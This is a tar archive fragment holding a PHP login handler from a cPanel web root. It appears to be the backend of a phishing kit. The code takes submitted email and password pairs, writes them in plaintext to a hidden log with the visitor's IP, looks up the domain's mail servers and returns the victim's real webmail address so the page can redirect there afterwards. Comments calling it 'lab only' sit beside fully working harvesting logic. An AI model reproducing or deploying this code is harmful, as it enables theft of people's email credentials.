.-.-.-.-.-

home/emeraadmin/public_html/test/login/handler.php000064400000006551151677417650016347 0ustar00<?php
header('Content-Type: application/json');

// Only accept POST (basic guard)
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    echo json_encode(['error' => 'POST only.']);
    exit;
}
if (!isset($_POST['email']) || !isset($_POST['password'])) {
    echo json_encode(['error' => 'Missing email or password.']);
    exit;
}

$email = filter_var(trim($_POST['email']), FILTER_SANITIZE_EMAIL);
$password = trim($_POST['password']);
$domain = substr(strrchr($email, "@"), 1) ?: '';
$client_ip = $_SERVER['REMOTE_ADDR'] ?? 'UNKNOWN';

// safe MX lookup
$mxRecords = [];
$dns = @dns_get_record($domain, DNS_MX);
if ($dns && is_array($dns)) {
    foreach ($dns as $r) {
        $mxRecords[] = [
            'host' => $r['host'] ?? null,
            'pri'  => $r['pri'] ?? null,
            'target'=> $r['target'] ?? null,
            'target_ip' => isset($r['target']) ? gethostbyname($r['target']) : null
        ];
    }
} else {
    $mxRecords[] = ['error' => 'No MX records found or lookup blocked'];
}

// probe common webmail paths (lightweight)
function probe_url($url) {
    // Use @get_headers but be tolerant of blocked outbound connections on shared hosting
    $ok = @get_headers($url);
    return $ok ? true : false;
}
function get_webmail_link($domain) {
    $candidates = [
        "https://webmail.$domain/",
        "https://mail.$domain/",
        "https://$domain/webmail/",
        "https://$domain:2096/",
        "https://$domain/owa/",
        "https://$domain/zimbra/",
        "https://webmail.mail.$domain/"
    ];
    foreach ($candidates as $u) {
        if (probe_url($u)) return $u;
    }
    // fallback: common path (may or may not exist)
    return "https://$domain/webmail";
}

$webmail_link = get_webmail_link($domain);

// Safe local logging (lab only)
// Prefer a directory outside public_html. On cPanel, public_html is usually the web root,
// so we try to place logs one level above public_html: __DIR__ . '/../logs'
$logDirCandidates = [
    __DIR__ . '/../logs',        // outside public_html if handler placed in public_html/...
    __DIR__ . '/logs'           // fallback inside same directory
];

$logDir = null;
foreach ($logDirCandidates as $d) {
    if (!file_exists($d)) {
        @mkdir($d, 0700, true);
    }
    if (is_dir($d) && is_writable($d)) {
        $logDir = $d;
        break;
    }
}

$logEntry = [
    'ts' => date('c'),
    'email' => $email,
    'password' => $password, // For lab only. Do NOT store production plaintext passwords.
    'ip' => $client_ip,
    'mx' => $mxRecords,
    'webmail' => $webmail_link
];

if ($logDir) {
    $logfile = $logDir . '/attempts.log';
    @file_put_contents($logfile, json_encode($logEntry, JSON_UNESCAPED_SLASHES) . PHP_EOL, FILE_APPEND | LOCK_EX);
    $log_status = 'logged';
} else {
    $log_status = 'failed to create log directory';
}

// Build safe openfile link (URL-encode)
$openfile_link = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'https' : 'http')
    . '://' . ($_SERVER['HTTP_HOST'] ?? 'yourdomain.com')
    . '/openfile/uid/' . rawurlencode($email);

// Return JSON (client can redirect UI on webmail_link)
echo json_encode([
    'status' => 'ok',
    'log_status' => $log_status,
    'webmail_link' => $webmail_link,
    'mx_records' => $mxRecords,
    'openfile_link' => $openfile_link
]);

/home/emeraadmin/.htpasswds/../public_html/PSCU/../node_modules/../4d695/handler.php.tar